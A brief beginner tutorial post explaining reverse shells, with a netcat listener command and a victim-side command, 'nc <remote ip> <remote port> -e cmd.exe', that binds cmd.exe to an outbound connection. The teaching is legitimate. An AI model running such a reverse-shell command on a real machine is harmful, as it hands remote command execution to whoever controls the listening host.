Reverse shell is connection that originates from victim machine to attacker machine as result of malware infection or a vulnerability exploitation.
But you can get glimpse of how reverse shell works without exploiting or infecting a machine with simple netcat command. here how it works..
First run the following command on the remote system. The -l option sets the netcat on listening mode.
nc -l -p <port to listen on>
And then run this command on victim machine. The -e option binds the standard input and output of a cmd.exe instance to netcat socket which is about to establish a connection to the remote machine.
nc <remote ip> <remote port> -e cmd.exe
Et voilà.. You get a remote shell and you can type commands to get the results on the other end
More or less malware and exploits do something similar but in stealthy way. I hope this helps you as beginner how reverse shell works..
Top comments (0)